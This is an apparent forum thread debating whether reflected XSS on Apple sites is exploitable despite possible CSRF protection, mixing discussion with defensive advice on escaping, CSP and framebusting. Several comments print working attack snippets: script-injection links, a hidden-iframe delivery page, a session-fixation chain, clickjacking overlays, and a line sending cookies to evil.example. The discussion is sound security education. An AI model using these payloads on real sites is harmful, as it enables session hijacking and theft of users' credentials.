
A page that lets you run arbitrary JavaScript in your own browser is not automatically vulnerable. For it to be a vulnerability, you must be able to run arbitrary JavaScript in someone else's browser. If these pages protect against CSRF, most of them aren't vulnerable; expresslane is one case where I think you could get the JS to someone else without CSRF.



If the arbitrary JS is specified by a specially crafted URL or form POST, you can make the JS execute in someone else's browser as easily as getting someone to click on a very innocent-looking link.
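For instance, if a hypothetical search page echoed its q parameter into the response unescaped (example.com, the parameter name, and evil.example are all made up for illustration), the innocent-looking link could be as simple as:

```html
<!-- Hypothetical: example.com/search reflects ?q= into the page unescaped.
     The q value is a URL-encoded <script> tag pointing at the attacker's JS. -->
<a href="http://example.com/search?q=%3Cscript%20src%3D%22http%3A%2F%2Fevil.example%2Fx.js%22%3E%3C%2Fscript%3E">
  Cute kitten video!
</a>
```

Anyone who clicks it ends up with the attacker's script running in their own session on example.com.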

And as soon as you can get someone to execute arbitrary JS on a particular domain, any CSRF protection will be useless because you practically control their browser. (You can even literally control their browser if you use BeEF: http://www.bindshell.net/tools/beef.html)

You can even completely hide the XSS happening by loading it into an invisible IFRAME, while the main page keeps the victim's attention occupied by playing the promised video of a cute kitten playing with a ball of string.
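A sketch of such a page (all URLs are hypothetical):

```html
<!-- The visible page keeps the victim busy with the promised kitten video -->
<video src="kitten.mp4" autoplay controls></video>

<!-- ...while an invisible IFRAME quietly loads the XSS'd page, here with a
     URL-encoded payload pulling in the attacker's script (URLs are made up) -->
<iframe style="width:0;height:0;border:0;visibility:hidden"
        src="http://example.com/search?q=%3Cscript%20src%3D%22http%3A%2F%2Fevil.example%2Fbeef.js%22%3E%3C%2Fscript%3E">
</iframe>
```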


Could you demonstrate that for me please?

Here's a simple little page that is vulnerable to XSS but not to CSRF:

http://brlewis.com/demo/xss-csrf.html

It works by GET or POST, so it should only take you a minute to craft a link that you can post right here in HN that makes that page pop an alert up in my browser.


This should work: http://mkjon.es/xss.html (your server seems to hang if I put "<script>" in the GET params, but assuming that worked and the page is vulnerable to XSS as you intended, this exploit would too). Just pretend the <img /> tag is a script tag.

Of course, this is kind of cheating - I exploit the fact that there's a CSRF bug on your web site. But that's kind of the point - just saying "oh well this is an XSS but it doesn't matter because this other unrelated thing prevents it" is bad security. It's entirely possible, even likely, that someone will come along at a later date and change that other seemingly-unrelated thing, having no idea that they're introducing a security hole in the process.


Cool! I'll look into the CSRF bug. EDIT: Using a vulnerability in another demo page definitely is cheating. But I do like the hack.

To be clear, "oh well this is an XSS but it doesn't matter" is not something I ever said. I only ever said that most of the screenshots in the article don't by themselves demonstrate a vulnerability on Apple's web sites.

EDIT 2: There was another demo on my server that let you set arbitrary cookies. This exploit relied on setting the JSESSIONID cookie. If a similar exploit existed on Apple's web site, presumably it would defeat the purpose of the attack, since the target user would no longer be authenticated as him/herself. I changed the cookie demo to disallow arbitrary cookie names, just to prevent it from interfering with other demos.


> To be clear, "oh well this is an XSS but it doesn't matter" is not something I ever said. I only ever said that most of the screenshots in the article don't by themselves demonstrate a vulnerability on Apple's web sites.

True, they may require some clever hacking to really exploit.

But experience has shown me that (way) more often than not, even though an XSS might not be directly exploitable on its own, there will be further (perhaps less critical) security problems that, combined with the at-first-sight-not-so-exploitable XSS, lead to a working exploit.

So it's always a better idea to make sure the XSS is not there in the first place, because if someone figures out a way to leverage it, they'll have full control over a visitor's browser on that domain.

Maybe the innocent flaw that allows the exploit isn't even there yet, but gets added accidentally during later development. It's still the XSS that is the most critical problem.


Sorry, didn't mean to put words in your mouth. I just wanted to point out that even when it seems like an XSS doesn't demonstrate a vulnerability, some of your assumptions may be wrong and it actually does.

Security is hard, let's go shopping!


Then I think we agree: These examples might or might not be vulnerabilities, though from appearances two of them seem very likely to be.


Maybe next time you can leave the bug in and copy the demos to a new set with the fixes? I'd have liked to see how this worked, but it no longer does :)


Oh, sorry. Basically he had another endpoint that let you set an arbitrary cookie to an arbitrary value (with no csrf protection).

So first I had it hit that endpoint, setting the JSESSIONID cookie to my value (off of which the csrf token is keyed). Then I had it redirect to an xss'd page with my csrf token, which it would see as valid because it matched the (forced) JSESSIONID.
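A rough sketch of what that exploit page could have looked like (endpoint names, parameter names, and token values are made up; the real demo may have differed):

```html
<!-- Step 1: CSRF against the cookie-setting demo forces the victim's
     JSESSIONID to a session the attacker already controls -->
<img src="http://target.example/setcookie?name=JSESSIONID&value=ATTACKER_SESSION_ID" />

<!-- Step 2: once the forced session is in place, redirect to the XSS-able
     form, supplying the CSRF token that matches the attacker's session -->
<script>
  setTimeout(function () {
    document.location = 'http://target.example/xss-csrf.html' +
      '?csrf=ATTACKER_TOKEN' +
      '&input=%3Cscript%20src%3D%22http%3A%2F%2Fevil.example%2Fx.js%22%3E%3C%2Fscript%3E';
  }, 1000); // give the cookie-setting request a moment to land
</script>
```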


It would be odd, however, for GET requests to contain an anti-CSRF token. In that case users couldn't pass links with parameters to others, since the links would carry a session-specific token. That seems to completely defeat the purpose of GET requests.


Ooh, that's a good one. When I said that, I wasn't thinking about the CSRF token being required with the XSS-able form. So yeah, that partially mitigates the problem.

It can still be done, however. But it'll take more than a few minutes, because I have only read about and played with PoCs of the relevant attacks, never implemented one like that myself.

One approach is "clickjacking". It involves putting your page in an IFRAME that is 100% alpha transparent, in a containing page. This is positioned over an image that says "CLICK TO PLAY" (or something) in such a way that the (invisible) button on your page aligns with the image. When you click the image, you're actually clicking the button on your site. Javascript in the containing page monitors when this happens and when it does, it can read the CSRF token from the URL that the IFRAME now points to. Once it knows the token, the XSS attack is straightforward.
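The containing page could look roughly like this (coordinates and URLs are purely illustrative):

```html
<!-- Bait image the victim thinks they're clicking -->
<img src="click-to-play.png"
     style="position:absolute; top:120px; left:80px;" />

<!-- Fully transparent IFRAME of the target page, positioned so its submit
     button sits exactly over the bait image -->
<iframe src="http://target.example/xss-csrf.html"
        style="position:absolute; top:80px; left:30px;
               width:600px; height:400px; opacity:0; border:0;">
</iframe>
```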

Now this only works because your form submits the CSRF token via a GET request, so I can read it from the URL. If your form would only accept a POST request, I'm not entirely sure how I'd do it. I need to think about that a little while longer; it's an interesting challenge, though.

There are some (IMO) far-fetched clickjacking-like attacks that require some social engineering (of the containing page) to get the user to perform certain actions that could do it. One way is to wrap a view-source: URL to your page in an IFRAME (only works in Firefox, afaik) and position and dress it up so that only the CSRF token is visible and it looks like a CAPTCHA. The user would enter the CAPTCHA/CSRF and then XSS is possible. But that's not very elegant, and I'm not entirely sure if Firefox still allows it. It's also not guaranteed to succeed if the user can't be bothered to enter a CAPTCHA to see the cute kitten video.

So in that case I'm not sure. One surefire way to prevent these and related clickjacking-style attacks is to put some framebusting JS code in your site. Twitter does this to prevent clickjacking from auto-submitting those pre-filled tweet forms. Check their source code; the way they do it is pretty thorough (even taking into account race conditions that might cause the submit click to go through just before the frame is busted).
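For reference, a common framebusting pattern (not necessarily Twitter's exact code) hides the page by default and only reveals it once the script confirms it isn't framed:

```html
<style id="antiClickjack">body { display: none !important; }</style>
<script>
  if (self === top) {
    // Not framed: remove the hiding style so the page renders normally
    var style = document.getElementById('antiClickjack');
    style.parentNode.removeChild(style);
  } else {
    // Framed: bust out of the containing page
    top.location = self.location;
  }
</script>
```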

I'm going to have to think about this for a while (how to do it if it were a POST form, that is. I'm fairly sure I could get the GET variant to work easily--I hope you could follow that example). The way you put a CSRF token in that form definitely makes it non-trivial, though.

(BTW, for anyone else who wants to take a shot at this: the CSRF token is not the same value every time, but randomly generated and tied to the session cookie, so clear your cookies before you try your brilliant exploit)


I don't think the particular clickjacking attack you suggest would work - you cannot read document.location on an iframe if that iframe has a different origin.

However, a variant of the later attack you describe would work. You could get the user to click on a Flash app on your page, which copies <script src="http://evil.com/script.js"></script> to your clipboard, then says "click on the box below and press ctrl-v, then enter". The box below would of course be the one on the XSSable page, and when the user hit enter, it would submit the form and load the second page, XSSing the user.

This sounds far-fetched, but I've seen successful attacks like this in the wild.


> I don't think the particular clickjacking attack you suggest would work - you cannot read document.location on an iframe if that iframe has a different origin.

Ok--I wondered about that. But I figured BeEF has that capability so it must be possible somehow. At least, as far as I understand BeEF loads the page in a fullscreen IFRAME controlling the browser from the containing page. Guess I was wrong.

No other way to pull it off? Cause the token is right there in the URL, it's gotta be leaked somewhere ... :-)


I'm not that familiar with BeEF, but it is possible to set the location on child iframes, just not get it.

It also looks like BeEF is running on your local machine, so they could presumably do whatever they want to bypass the browser's security model.


Both of those attacks fail if the page protects itself against CSRF: http://en.wikipedia.org/wiki/Cross-site_request_forgery#Prev...


You can initiate an XSS attack without making any cross-site requests. Being able to launch a CSRF attack is not a prerequisite for being able to launch an XSS attack. It does help, though.


If I didn't know that, my original post would have said that all the Apple pages would be invulnerable if they prevented CSRF. I think the expresslane page is one where data could go in the database and others could see it.

CSRF is not a prereq in general, but it is a prereq for the attacks tripzilch listed.


A simple example: you can pass a link to someone that contains javascript which submits a form for them without them knowing.
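The injected part might look like this (the form and field names are made up for illustration):

```html
<!-- Injected payload: once the reflected script runs on the target origin,
     it can fill in and submit any form on the page as the victim -->
<script>
  var form = document.forms[0];  // e.g. the site's own settings form
  form.elements['email'].value = 'attacker@evil.example';
  form.submit();  // sent with the victim's cookies, and with any
                  // CSRF token the page already embedded in the form
</script>
```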


You could "share" a link with your own javascript embedded in it that reads cookies and sends them to your logging server. Or customize the website so that when somebody types their password, it sends it to your logging server. If you can run custom javascript on a page, it's a security problem.
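The cookie-stealing variant is practically a one-liner once the script runs on the target origin (evil.example stands in for the attacker's logging server):

```html
<script>
  // Exfiltrate the victim's cookies via an image request
  new Image().src = 'http://evil.example/log?c=' +
    encodeURIComponent(document.cookie);
</script>
```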


It might sound trivial, but on many systems it can lead to serious privilege escalation and expose huge vulnerabilities further up in the chain. Check out the case study below for a real-world example.

http://mobile.eweek.com/c/a/Security/Hackers-Hit-Apacheorg-C...

Also, if you want to learn more about avoiding these issues, OWASP is one of the best sources out there.

https://www.owasp.org/index.php/Main_Page


That attack fails if the page prevents CSRF: http://en.wikipedia.org/wiki/Cross-site_request_forgery#Prev...


Not necessarily. Typical CSRF implementations prevent the server from accepting inputs coming from an "unauthorized" page. This might or might not prevent XSS from being triggered on the client side.

XSS can propagate to other users via database rather than HTTP requests.

In general, you should prevent attacks one by one. Hoping that one security mechanism will accidentally fix other issues will result in a design that is insecure, convoluted, and hard to reason about. Remember: you have to prevent all attacks; attackers only need to find one vulnerability. Therefore, any kind of complexity in the design works to their advantage.


Exactly, defense in depth is the name of the game.

An example of a defense in depth strategy:

Layer 1: Customer runs a WAF (web app firewall) to do some CSRF and XSS mitigation

Layer 2: App contains its own intrusion detection system that preprocesses all requests for "typical" SQL injection, CSRF and XSS attacks and prevents the rest of the code from executing if this is the case. I'm using PHP-IDS for this.

Layer 3: every request to the server must submit an anti-CSRF token and is immediately refused if it does not do so.

Layer 4: Business logic contains its own positive input validation (all input must be in the expected format), and prevents the rest of the code from executing if the input is not valid. This is meant to prevent XSS and SQL injection when data enters the system.

Layer 5: all DB requests use parameters instead of concatenating variables into queries to mitigate the risk of SQL injection.

Layer 6: All output is encoded to prevent XSS attacks when data leaves the system.

In such a solution you can have a security issue in one of the layers and still have a system that is secure.


Exactly. Don't defend from XSS by implementing CSRF defences. Defend from XSS by making sure you properly encode every piece of data that enters your web page. Then add CSRF on top, to prevent third party sites from initiating "clicks" on your page. Then implement Content-Security-Policy to help defend against programmer mistakes which leave CSRF/XSS holes open.
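A minimal sketch of that encoding step (real apps should prefer the encoder built into their template engine over rolling their own):

```javascript
// Escape the five HTML-significant characters so untrusted data renders as
// inert text instead of markup. '&' must be replaced first.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
```

On top of that, a header along the lines of `Content-Security-Policy: default-src 'self'; script-src 'self'` (directive values illustrative) tells the browser to refuse inline and third-party scripts even if a payload does slip through.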


I agree that XSS can propagate to other users via database...I'm pretty sure the expresslane example is a real vulnerability for that reason. But note that the grandparent post was not describing an attack via the database.

I am not hoping that CSRF prevention will make everything OK on the Apple website (which I have no affiliation with, by the way). Nor am I saying XSS prevention is not worthwhile. I'm merely pointing out that this blog post is not demonstrating 11 vulnerabilities in Apple's web site. There might actually be 11 vulnerabilities, but the blog post doesn't give enough information for us to know.


Not if the page is simply a normal page whose URL you would type in yourself. CSRF protection doesn't make sense there. I could send you a link to facebook.com with an embedded script.


If the page accepts URL parameters or POST data, CSRF makes perfect sense.


> If the page accepts URL parameters … CSRF makes perfect sense.

No, it doesn't.

CSRF makes perfect sense when there is data on the server that is being modified by a request. A simple "search.php?query=…" doesn't need CSRF protection.

If you're passing parameters that modify the server in the URL (instead of a part of the post data) you're using HTTP wrong and adding CSRF protection in the query string is the wrong solution.


You're right about the search example. That doubles the list of demonstrated vulnerabilities in this article from 1 to 2.

I certainly agree that using GET for changing server state would be wrong. I don't know if any of the examples in the article work that way, since all we're provided with is a screenshot with an alert box. That's demonstrated sloppiness on Apple's web site, but not enough information to demonstrate vulnerability.

(I'm definitely voting up your reply for intelligent discussion.)


These screenshots show pretty textbook reflected XSS vulnerabilities, so I don't see why you think there's a CSRF vulnerability required for an exploit. Most of the targets are innocuous operations that aren't modifying any persistent state, so they wouldn't normally have CSRF protection. In particular, the search queries all appear to support direct-linking (notice the query string), which means they can't employ CSRF mitigations (because it would break the links).


Yes, the search query string is one where CSRF prevention would be out of place. Most of them, though, are intermediate results in a user-specific interaction where CSRF prevention wouldn't break anything. There are a lot of web frameworks out there; some of them likely do CSRF prevention by default. From this article we can definitely conclude that Apple web sites are sloppy in 11 places, but there's not enough information to say there are 11 vulnerabilities.


I'm getting the impression you don't entirely understand how CSRF exploits and mitigations work. Things like CSRF cookies are intended to protect persistent state at the server. I don't think I've ever seen CSRF mitigations used to gate response output. And to be honest, it doesn't sound like a good strategy because it wouldn't necessarily protect the target from exploit. You're still likely to have other vectors of bypassing a CSRF protection used in such a manner.


Your impression is entirely mistaken. I do entirely understand CSRF exploits and mitigations. I think what's happening is that when I write "not a demonstrated vulnerability" you (and others) are reading "a fine and dandy example of web programming". That's why phrases like "doesn't sound like a good strategy" keep popping up in your reply and others when I'm not talking about recommended strategy.

When I wrote my first comment, this story was at the top of the front page. A story about 10 demonstrated vulnerabilities on Apple's web sites would belong there. A story about 2 demonstrated vulnerabilities and 8 instances of sloppiness that might be vulnerabilities but we don't know without more information -- that's not really a top-of-the-front-page story.


You're arguing the existence of a mitigation strategy that's extremely unlikely and not at all evidenced by the information available. So, it's not that I (or anyone else as far as I can tell) took your statements as more than they are. It's just that your basic premise is highly questionable at best. It's not strictly impossible, but it is based on extraordinary assumptions lacking any extraordinary evidence to support them.


(come on people, what's with all the downvotes? this is an interesting discussion! maybe the premise is incorrect but the answers are super informative)

Hey brlewis, even though we haven't managed to (completely/reliably) crack your CSRF example YET ... I hope you agree that it's better to not have an XSS in the first place rather than rely on CSRF to make it (way) more difficult, right?


Agreed. The screenshots in the article show bugs that should be fixed whether or not they're currently exploitable. And they might even be currently exploitable...more info needed.



